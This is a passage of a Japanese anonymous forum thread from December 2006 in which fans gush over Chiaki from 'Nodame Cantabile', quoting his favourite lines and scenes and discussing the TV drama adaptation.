ダヴィンチのアンケートでは千秋と付き合いたい女性は63%で
千秋と付き合いたい男性82%だったな

164 :名無しかわいいよ名無し:2006/12/06(水) 11:03:25 ID:yNHGBnC5
>>163
ちょwwwwwwww

165 :名無しかわいいよ名無し:2006/12/06(水) 11:05:03 ID:yNHGBnC5
まぁ、確かにホモに好かれそうな体つきしてるよな。

166 :名無しかわいいよ名無し:2006/12/06(水) 11:15:47 ID:nf6nBtCG
>>163
真澄ちゃん大量発生wwwwww

167 :名無しかわいいよ名無し:2006/12/06(水) 12:01:46 ID:iTpphPHW
>>163 真澄ちゃん呼んできてー!!

ワラワラワラワラワラワラ…群がる真澄ちゃん(もどき含む)

168 :名無しかわいいよ名無し:2006/12/06(水) 12:07:06 ID:cnK+0vDr
ダ・ヴィンチより

男性は「実際にあんな人がいたら同性でも絶対惹かれてしまうと思う」(31・フリーター)
「認められたい」(36・会社員)「叱ってくれるので峰みたいな俺にはいいかも」(28・無職)
と付き合いたい派、圧勝。付き合いたくない派にしても
「多分あっちからお断わりだろう。よっぽどの相手じゃないと千秋の相手はつとまらない」(24・学生)
と同じ男として千秋へのリスペクトぶりがうかがえる意見、多し!

>>160の意見も聞きたい

169 :名無しかわいいよ名無し:2006/12/06(水) 13:14:57 ID:yNHGBnC5
玉木がガチホモだったらファンになる

170 :名無しかわいいよ名無し:2006/12/06(水) 13:39:43 ID:/YzR3Inv
……('A`)?

171 :名無しかわいいよ名無し:2006/12/06(水) 13:57:31 ID:ASltpj32
女としては俺様タイプの人と付き合ってみたいわ〜。
でも千秋様って実はドMよね。
音楽に対してものだめに対しても。

172 :名無しかわいいよ名無し:2006/12/06(水) 14:00:33 ID:iTpphPHW
>>171 一見Sの実はM…
最高じゃなかと!?w

173 :名無しかわいいよ名無し:2006/12/06(水) 15:26:49 ID:ASltpj32
ええ、最高っすよw

174 :名無しかわいいよ名無し:2006/12/06(水) 16:16:33 ID:1DALIi7C
>>160
皆恋愛感情無しでも千秋様がだいすきさ。

175 :名無しかわいいよ名無し:2006/12/06(水) 17:36:52 ID:ASltpj32
のだめの公式イイね!!
名場面の待ち受けがいっぱい!!カラーだし!!
R☆Sのポスターとかめちゃくちゃ素敵♪
真澄ちゃんの「友達になってください!」を待ち受けにしてみた♪

176 :名無しかわいいよ名無し:2006/12/06(水) 20:10:11 ID:ABLKp/2W
>>174
ああ好きさ!大好きさ!

177 :名無しかわいいよ名無し:2006/12/06(水) 22:15:59 ID:yNHGBnC5
千秋様は少女漫画の王子様★

178 :名無しかわいいよ名無し:2006/12/06(水) 22:56:17 ID:iTpphPHW
でものだめとくっついてるからなんか親近感。

久しぶりに漫画の登場人物に萌えてる…性格がまさにストライクなんだよなぁ

179 :名無しかわいいよ名無し:2006/12/06(水) 23:18:14 ID:yNHGBnC5
外見だけだったら見ようによってはチャラいホストに見えるもんなぁ。

180 :名無しかわいいよ名無し:2006/12/06(水) 23:21:20 ID:VqgyVW5+
黒髪(;´Д`)ハァハァ

181 :名無しかわいいよ名無し:2006/12/06(水) 23:25:40 ID:iTpphPHW
>>179 ホストとはちがくないか?

182 :名無しかわいいよ名無し:2006/12/07(木) 00:24:10 ID:cmE5LOl0
ホスト的なウザイ程の自己主張オーラはないな

183 :名無しかわいいよ名無し:2006/12/07(木) 01:09:29 ID:YpxAnp9v
でも玉木千秋、黒髪だからはまるんだろうなー…
茶髪の頃の玉木は別に好きじゃなかったし

千秋が憑依したから玉木好きなのか!

184 :名無しかわいいよ名無し:2006/12/07(木) 03:53:09 ID:bap4M72j
本当に久しぶりだ。
漫画の、しかも少女漫画のヒロインの相手役に燃えるなんて。

185 :名無しかわいいよ名無し:2006/12/07(木) 08:43:00 ID:KtFrUwTW
真壁君以来だ

186 :名無しかわいいよ名無し:2006/12/07(木) 09:41:18 ID:YpxAnp9v
>>187 真壁…?
金田一しか思いつかないorz

187 :名無しかわいいよ名無し:2006/12/07(木) 10:18:45 ID:0G9h2fz/
最近なんか伸びが良いなw
やっと皆千秋の魅力に気づいたのか

188 :名無しかわいいよ名無し:2006/12/07(木) 13:52:47 ID:ReujaK8m
>>185
禿あがるほど同意w
真壁君以上の人が現れるとは思っていなかった。
アイツも究極のツンデレだからなぁ。
ちなみに真壁くんとはりぼんの「ときめきトゥナイト」に出てくる人です。

189 :160:2006/12/07(木) 20:48:25 ID:nYsNSrRF
うおっ、なんか盛り上がっちゃってる。
上手く説明できないけど、面白いやつで、いいやつで、正直者で、だけど男ツンデレ(気味)だから好きだ。
ツンデレの男キャラって好きなんだよな、見ててもどかしいというか微笑ましいというかw
千秋の他にもキョンとかキョンとかキョンとか。あ、あとキョンとか。

女の人は、作品の中に自分を投影する人が多いのかな?
経験上、男の人はキャラを読者の視点から好き、女の人はキャラをキャラの視点から好きって人が多い気がする。

190 :名無しかわいいよ名無し:2006/12/07(木) 21:22:00 ID:YpxAnp9v
>>188 ありがとう。
ときめきトゥナイト…なかよし派だったからやっぱ知らんorz

そういえばドラマって千秋のサービスシーン大杉w

191 :名無しかわいいよ名無し:2006/12/07(木) 23:09:20 ID:43pysDA7
ほえ〜

192 :名無しかわいいよ名無し:2006/12/07(木) 23:10:08 ID:zweGghcw
だがそれがいい

193 :名無しかわいいよ名無し:2006/12/08(金) 02:57:02 ID:El4Cxxq1
>>189
夾のこと?だったらナツカシスwそういえば好きだな夾君。

194 :名無しかわいいよ名無し:2006/12/08(金) 09:19:43 ID:2sc/TerL
>>189 女だけど、そうかも。
入り込むっていうかね。

ツンデレ千秋…カワユス

195 :名無しかわいいよ名無し:2006/12/08(金) 12:11:59 ID:HcEShecs
>>193
たぶん涼宮ハルヒの憂鬱の主人公のほうのことだと思う。

196 :名無しかわいいよ名無し:2006/12/08(金) 12:51:46 ID:4+pCiKGy
まぁ、夾も典型的なツンデレだからな。由希より人気あったし。

197 :名無しかわいいよ名無し:2006/12/08(金) 13:02:19 ID:LlRNo7Gh
千秋以外のキャラの話されてもさっぱり分からんのだが

198 :名無しかわいいよ名無し:2006/12/08(金) 14:35:11 ID:2sc/TerL
>>197 たすかに…w
じゃあネタふり。

みなさんは千秋のどんな台詞が記憶に残ってますか?
千秋語録作ってみまショウ!

199 :名無しかわいいよ名無し:2006/12/08(金) 15:47:19 ID:LlRNo7Gh
ありすぎてパッとは思いつかない・・・
シリアスなセリフでは15巻の「それでいい 俺が見失わなければ」とか好き

200 :名無しかわいいよ名無し:2006/12/08(金) 18:40:02 ID:2sc/TerL
じゃあ自分は

『その中で自分が選んだのは…変態…だけですから』
(本が手元にないため違ったらだれか直して)

201 :名無しかわいいよ名無し:2006/12/08(金) 18:47:33 ID:bXGzebs5
おせーよ おまえ

202 :名無しかわいいよ名無し:2006/12/08(金) 18:52:45 ID:El4Cxxq1
台詞…楽しい音楽の時間だ!って感じのやつが好きやき。

203 :名無しかわいいよ名無し:2006/12/08(金) 19:12:47 ID:2sc/TerL
>>201 ほぉぉぉぉ!!!
そんな萌え台詞あったね
じゃあ

おまえの洗濯物、乾燥機に入ってるから

204 :名無しかわいいよ名無し:2006/12/08(金) 19:51:38 ID:88a0JCur
一巻のピアノ指導
「カンタービレ!」
すげーかっこいいコマ

205 :名無しかわいいよ名無し:2006/12/08(金) 20:50:32 ID:1faWl5iZ
ほら、ガリ寿司

>>204
同意!


206 :名無しかわいいよ名無し:2006/12/08(金) 21:44:22 ID:xc45KfdJ
千秋かっこいい
やっぱ大川でハグするとこは最高だね
海が嫌いでのだめに抱きついてるとことかたまない

207 :名無しかわいいよ名無し:2006/12/08(金) 21:49:42 ID:OY9Ls4zK
たった2小節で間違えるなー!!!

208 :名無しかわいいよ名無し:2006/12/08(金) 22:10:42 ID:2sc/TerL
(じゃあのだめも頑張らないと、デスね)
…うん


209 :名無しかわいいよ名無し:2006/12/08(金) 22:25:44 ID:OfrQg1fm
>>207
そこは「バチーン」って効果音も付けてほしいところw

210 :名無しかわいいよ名無し:2006/12/08(金) 22:44:56 ID:Q56wTlKu
違う。俺が鳴らせなかったんだ
(今ならあの人の使う魔法が使えると思ってたのに。思い上がりだ)

うろ覚えだがこのセリフとモノローグが好きだ

211 :名無しかわいいよ名無し:2006/12/08(金) 23:13:44 ID:2sc/TerL
表情でいくと、
ヨーロッパでのだめがハグしてるとこを黒木君に見られて赤面&壊れてる顔

212 :名無しかわいいよ名無し:2006/12/09(土) 02:44:21 ID:65JaVweN
カンタービレの語源だよ。

213 :名無しかわいいよ名無し:2006/12/09(土) 03:36:17 ID:xGrByFFo
仕方なくコタツに入ったくせに
「・・・・あったかい」

ぬくぬく千秋様かわええ!!!!

コタツ布団なり枕なりクッションなり
モフモフしたものに顔を埋める千秋様かわええ!!!!

214 :名無しかわいいよ名無し:2006/12/09(土) 12:13:25 ID:iUgveUGe
ガリ寿司は笑った
あれが一番好きかもしれない

215 :名無しかわいいよ名無し:2006/12/09(土) 16:24:01 ID:ekaeLkTd
俺様千秋も好きだけどヘタレ千秋も好き…

真面目な千秋も好きだけど白目の千秋も好き…

216 :名無しかわいいよ名無し:2006/12/09(土) 16:30:41 ID:64t/iw7L
ヘタレなら

ひっ
やめっ……やっぱ帰ろ?

が大好きだw
はたから見たらただのイチャこきだけど本人はそれどころじゃないんだろうなww

217 :名無しかわいいよ名無し:2006/12/09(土) 19:42:53 ID:ekaeLkTd
>>216 あれヘタレにもほどがあるよねw


218 :名無しかわいいよ名無し:2006/12/09(土) 19:43:10 ID:jUoNLNQ3
「な…なんで俺がラフマニノフでクネクネしないといけないんですか」

ウロですま。
改心してクネクネすると思ったのに!思ったのに!

219 :名無しかわいいよ名無し:2006/12/09(土) 22:40:04 ID:jUoNLNQ3
「やるなら……ここだろ!」

ヒィッ(萌

220 :名無しかわいいよ名無し:2006/12/10(日) 10:08:09 ID:qe0k0OVM
>>216
それ大好きだ!!w
完璧な人の弱点とか可愛すぎる

221 :名無しかわいいよ名無し:2006/12/10(日) 11:21:53 ID:kYDKgGt0

  |
  |⌒::::::ヽ
  |:::::::::::::::::)
  |:::::人::::::ノ
  | ・ω・)ノ 千秋さま…
  | つ
  |ノ
  |

222 :名無しかわいいよ名無し:2006/12/11(月) 10:35:38 ID:StrPY17F
>>221
真澄ちゃん乙

223 : ◆HhTh8Gv36s :2006/12/11(月) 10:48:49 ID:FKukcORw
 

224 :名無しかわいいよ名無し:2006/12/12(火) 01:00:23 ID:SmvR27Td
>>221
思わず萌えたw


最初と比べてつんつんからやっとデレ来たようで

225 :名無しかわいいよ名無し:2006/12/12(火) 07:07:55 ID:nRhOr6St
車を買いにいってジャンと会った時のやり取りが好きー!

「俺が新車に乗りかえるころ
        売ってやるよ」
かわいい千秋、かっこいい千秋、優しい千秋もいいけど
やっぱり彼の魅力は『俺様節』だと思うなw

226 :名無しかわいいよ名無し:2006/12/12(火) 08:27:25 ID:eCGE0MkF
やばい…玉木千秋が夢にでてくるよ…

はまりすぎだ、自分

227 :名無しかわいいよ名無し:2006/12/12(火) 10:30:57 ID:91S/yr1Y
>>225
ノシそのシーンとセリフ好きすぎる!
やっぱり何様俺様千秋様だな


228 :名無しかわいいよ名無し:2006/12/12(火) 12:05:35 ID:vv+jPAw3
完璧な男よりちょっと崩れた顔の方が好きな人多いよと、
友達が全然ビジュアルじゃないキャラが好きな話をした後に、
私が千秋様が好き〜って言ったら、「あぁ・・・○○はああゆうの好きそうだね・・・」

なんだかとっても微妙な気分!(*´∀`)ノシ

229 :名無しかわいいよ名無し:2006/12/12(火) 12:08:21 ID:vv+jPAw3
見てる分なら完璧な顔の方がいいに決まってる

230 :名無しかわいいよ名無し:2006/12/12(火) 12:30:13 ID:nRhOr6St
>>227
だよね!いいよね!
よかった。仲間いてw



231 :名無しかわいいよ名無し:2006/12/12(火) 13:18:36 ID:OhIp3FOI
中古車ディーラーの乱いいよねw

>>229
美人は三日で飽きるって言うぞ

232 :名無しかわいいよ名無し:2006/12/12(火) 13:34:44 ID:xFoMi+7W
>>225
俺も好きだ。
あの上手いこと言って満足げな顔が……w

>>229
顔が左右対称(ホクロなどを除く)なら十分だと思うんだぜ。



千秋を語れて、女性の住人が多くて。
ここはハーレムですね。

233 :名無しかわいいよ名無し:2006/12/12(火) 13:39:17 ID:TeOMNsGx
>>225
俺様節に同意〜

234 :ajptJf:2006/12/12(火) 13:53:19 ID:9jkM7XN2
今週のノダカン受けたね〜千秋。ビビりハンパじゃねぇ〜(笑)

235 :名無しかわいいよ名無し:2006/12/12(火) 17:55:15 ID:eCGE0MkF
>>234 ノダカン?

236 :名無しかわいいよ名無し:2006/12/13(水) 06:54:18 ID:LzqwCFR4
けっこう俺様節好きがいますね。
もひとつおすすめが・・
ブノワ家でのリサイタルがおわってのだめが
千秋に感想を求めるシーンでの台詞

「すごく・・・心臓に悪かった。ふざけんなバカ」
「なんだよ、あのリストの出だし!殺す気か。」

ブノワ家リサイタルの話はけっこう色んな千秋
見られるんじゃないかな?

アンドレイ姿もいいカンジだしw

237 :名無しかわいいよ名無し:2006/12/13(水) 08:41:31 ID:VT18NsmQ
もうのだめの演奏=自分のこと なんだよね。そんな千秋も好きだ

今回のドラマ、のだめに『メシ作ってやってもいいぞ』→『いいデス』→『…え』
『あいつは俺なんかいなくても…』
の流れも好き。

238 :名無しかわいいよ名無し:2006/12/13(水) 11:59:32 ID:H4xm1OFn
音楽で人に厳しく自分にも厳しいのが好きだ。鬼千秋萌え。

239 :名無しかわいいよ名無し:2006/12/13(水) 12:19:32 ID:OlQasqO9
>>237
今週見逃した俺・・・orz
あー見たかったぜちくしょう

240 :名無しかわいいよ名無し:2006/12/13(水) 12:56:23 ID:VT18NsmQ
>>239 今週もたくさん千秋でたよー!
パソコンならようつーべで探してみたら?

のだめが離れてって淋しがる千秋テラカワイス…

241 :名無しかわいいよ名無し:2006/12/14(木) 11:09:03 ID:q0QTKat0
ようつーべwwよし探してみるか・・・

千秋はすげーよ女の子キャラ並に萌えられる
なんでだろうな

242 :名無しかわいいよ名無し:2006/12/14(木) 11:51:54 ID:TnVEDdQT
>>241 交響人情夢、まだ9話はupされてないみたい。
早くみれるといいね。
近所の人ならDVD焼いてあげるのにw

243 :名無しかわいいよ名無し:2006/12/14(木) 17:33:35 ID:TnVEDdQT
>>242
×人情夢
〇情人夢

スマソ

244 :名無しかわいいよ名無し:2006/12/15(金) 21:45:58 ID:m4BBARQm
定期揚げ

245 :名無しかわいいよ名無し:2006/12/16(土) 02:17:38 ID:z3nJtz6c
千秋
しゅてき!

246 :名無しかわいいよ名無し:2006/12/16(土) 08:35:50 ID:5jZiwn8j
しゅてきしゅてき!
のだめになりたい(*´д`)

247 :名無しかわいいよ名無し:2006/12/17(日) 18:44:57 ID:66W3QaL4
千秋様・・ハアハア

しゅきですぅ〜

248 :名無しかわいいよ名無し:2006/12/17(日) 19:16:17 ID:j98zN78M
のだめが一緒にいる時の千秋は輝いてるよ色んな意味で

249 :名無しかわいいよ名無し:2006/12/17(日) 21:31:28 ID:NG08nPpj
>>248 たとえば?
(*´д`*)ハアハァ

250 :名無しかわいいよ名無し:2006/12/17(日) 22:52:50 ID:EYTfDkKq
かわいい系のアクセサリー買っちゃうとこ

251 :名無しかわいいよ名無し:2006/12/18(月) 06:19:41 ID:NMalwlDs
(*´д`*)ハアハァ

(*´д`*)ハアハァ





252 :名無しかわいいよ名無し:2006/12/18(月) 11:12:32 ID:l4A81obf
千秋スレ立ったんだ〜

どんな千秋が好き???

253 :名無しかわいいよ名無し:2006/12/18(月) 12:01:28 ID:IaSS/S6J
全部…と言ったら話が続かないなw
ヘタレてる時も照れてるとこもたまらんし
指揮してる姿は色気がありすぎる(*´Д`)

254 :名無しかわいいよ名無し:2006/12/18(月) 12:02:44 ID:v2uPMbtY
どんなっていうかヘタレとかっこよさのギャップが好き


255 :名無しかわいいよ名無し:2006/12/18(月) 13:51:48 ID:l4A81obf
おせーよ おまえ=@はかっこよすぎっす


256 :名無しかわいいよ名無し:2006/12/18(月) 22:57:10 ID:3c3FqC+8
卒業式に
のだめ!先生に挨拶して帰るぞ!(うろ覚え)が好きだ

257 :名無しかわいいよ名無し:2006/12/19(火) 19:09:27 ID:7jKM1kAt
おせーよおまえ
の前のかわいくねーも好き
千秋のだめにハマりすぎだろーwww

258 :名無しかわいいよ名無し:2006/12/20(水) 02:17:17 ID:wlcXAyZE
ていうか全部好きだ
千秋というだけで好きだ

259 :名無しかわいいよ名無し:2006/12/20(水) 03:41:02 ID:/ak+qCXm
( *´Д`)ハァハァ
( *´Д`)ハァハァ
( *´Д`)ハァハァ
( *´Д`)ハァハァ
( *´Д`)ハァハァ






260 :名無しかわいいよ名無し:2006/12/20(水) 13:43:22 ID:7QcVW4oM
エプロン姿もいい…


261 :名無しかわいいよ名無し:2006/12/20(水) 16:28:19 ID:wlcXAyZE
エプロン脱ぐとこもいい…

262 :名無しかわいいよ名無し:2006/12/20(水) 17:10:24 ID:7QcVW4oM
オォ〜 エプロン脱ぐとこ!?
何巻?

263 :名無しかわいいよ名無し:2006/12/20(水) 17:43:31 ID:wlcXAyZE
あ…ごめん ドラマとごっちゃなったorz

逝ってくるノシ

264 :名無しかわいいよ名無し:2006/12/20(水) 17:45:08 ID:wlcXAyZE
自分のIDトイレ臭いぜだ…
もうだめだ、吊ってくるorz

265 :名無しかわいいよ名無し:2006/12/21(木) 00:09:12 ID:+mXy0IpK
ドラマの千秋はエプロン脱いでたんだ〜
見逃した…



266 :名無しかわいいよ名無し:2006/12/21(木) 00:09:59 ID:To6GzSm+
テス

267 :名無しかわいいよ名無し:2006/12/21(木) 09:10:00 ID:T5LSu3LE
千秋様〜萌えw

268 :名無しかわいいよ名無し:2006/12/22(金) 12:25:05 ID:18IVkEcX
引っ越しの支度を頑張る千秋さま…
かっこいい!

269 :名無しかわいいよ名無し:2006/12/22(金) 15:45:51 ID:/4eoW6ez
引越しちゃうんだよね〜
のだめと離れて大丈夫なのか!?

270 :名無しかわいいよ名無し:2006/12/22(金) 16:32:23 ID:18IVkEcX
千秋はツンデレだからなぁ
心配だね。
ちゃんとのだめが定期的に充電させてあげないと!

271 :作者と同じ歳:2006/12/22(金) 23:03:00 ID:DWzGvdDd
突然すみません。質問なんですが、作者の出た高校は、西新宿にある関東国際高校でしょうか?

自分は、作者の著書『平成酔っ払い研究所』を読みました。すごく面白かったです。
まさか、先生が漫画賞を受賞するとは思いませんでした。

272 :名無しかわいいよ名無し:2006/12/23(土) 00:02:04 ID:KCd2AjdZ
>>270
のだめが充電してるようで実はさせてたのかw

273 :名無しかわいいよ名無し:2006/12/25(月) 10:08:55 ID:kMYwj5OL
保守

274 :名無しかわいいよ名無し:2006/12/25(月) 11:05:27 ID:dAk74dPe
>>272 どっちかっていうと、千秋はのだめの手の上で転がされてる感じがするw

のだめはそれをわかってるんだけど、千秋はプライドから意地でも認めようとしない。
だがそこがいい。

275 :名無しかわいいよ名無し:2006/12/25(月) 19:15:25 ID:tSDYK1OB
そういや今日はドラマ最終回

276 :名無しかわいいよ名無し:2006/12/26(火) 02:29:39 ID:gcdCQXQt
>>275 色々あったけど、よかったね。
ドラマと漫画はやっぱり別の話だけどどっちの千秋さまも素敵だ。

277 :名無しかわいいよ名無し:2006/12/26(火) 10:09:48 ID:Zmc8JLZq
のだめの愛情表現に安心しちゃってるだけだ〜
かまってもらえないと不安になっちゃうくせに



278 :名無しかわいいよ名無し:2006/12/26(火) 15:40:46 ID:gcdCQXQt
そうそう。
のだめは千秋の弱点っていうことを知ってるから、会わない=嫌がらせ をやってたんだよね。
自分はちゃっかり充電しといて…w
翻弄される(自称)俺様、カワユス

279 :名無しかわいいよ名無し:2006/12/26(火) 16:00:31 ID:lHAJhZkq
アナタ達、全員失格デース!

280 :名無しかわいいよ名無し:2006/12/28(木) 17:50:47 ID:1UfSdR5S
>>279 何でデスか、ミルヒー!!

49 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)